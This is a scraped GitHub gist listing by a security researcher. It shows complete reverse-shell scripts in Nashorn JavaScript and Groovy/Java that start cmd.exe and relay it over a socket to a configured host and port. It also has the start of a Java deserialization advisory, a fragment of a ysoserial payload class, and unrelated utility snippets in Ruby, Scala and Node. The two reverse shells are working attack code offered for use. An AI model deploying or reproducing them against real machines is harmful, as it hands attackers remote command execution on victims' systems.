Skip to content

Instantly share code, notes, and snippets.

Avatar

Chris Frohoff frohoff

  • San Diego, CA
View GitHub Profile
@frohoff
frohoff / revsh.js
Created Mar 22, 2016
Nashorn Javascript Reverse Shell
View revsh.js
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
@frohoff
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@frohoff
frohoff / JAVA-ADVISORY.md
Last active Nov 27, 2021
Java 7u21 Security Advisory
View JAVA-ADVISORY.md

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
View CommonsBeanutilsCollectionsLogging1.java
package ysoserial.payloads;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Dependencies;
View mdexec.rb
#!/usr/bin/env ruby
require 'open3'
def replace(md, strip=false)
rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n)*)```\s*```mdexec\n([^`\n]{3,}\n)*```/
replaced = md.gsub(rex) do |rep|
int, code = $1, $2
if !strip
@frohoff
frohoff / gist:db15cb9244e5a6184ab3
Created May 7, 2015
functional composition flow
View gist:db15cb9244e5a6184ab3
object Test extends App {
lazy val flow: SplunkEvent => Seq[Email[Alert]] =
receiveEvent andTap rawTap andThen
convertToSecurityEvent andMaybeTap eventTap andMaybe
classifyIfTrained andMaybeTap classificationTap andMaybeSeq
aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach
convertToAlert andForEachTap alertTap andForEachOpt
createEmail andForEachTap emailTap
}
@frohoff
frohoff / Flow.scala
Last active Aug 29, 2015
monadish reactive flow combinators
View Flow.scala
package org.frohoff.flow
import scala.collection.mutable.Buffer
import Flow._
object Test extends App {
val f: Flow[Int,Int] = Flow[Int]
val f2: Flow[Int,String] = f.map(_.toHexString)
val f3: Flow[Int,Option[Int]] = f.map(Option(_))
//f3.flatten // doesn't compile yet
@frohoff
frohoff / terse-rc4.rb
Last active Aug 29, 2015
terse ruby rc4 (161 chars, 154 chars not counting proc/param overhead) for https://twitter.com/matthew_d_green/status/524966294492577792
View terse-rc4.rb
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}
View nullsafe.scala
object NullSafeConversions {
implicit def ns[A](a:A) = new NullSafe(a)
implicit def ro[A](o:Option[A]) = new RichOption(o)
def ?[A](a:A) = if (a == null) Some(a) else None
case class NullSafe[A](a:A) extends AnyVal {
def ?[B >: Null](f: A => B):B = if (a != null) f(a) else null
}
case class RichOption[A](o:Option[A]) extends AnyVal {
@frohoff
frohoff / longchaintest.js
Last active Aug 29, 2015
long stream chain test
View longchaintest.js
var crypto = require('crypto')
var hashType = process.argv[2] || 'sha1'
var numHashes = parseInt(process.argv[3] || 1)
// init chain with stdout
var piped = process.stdout
for (var i = 0; i < numHashes; i++) {
// prepend chain with new hash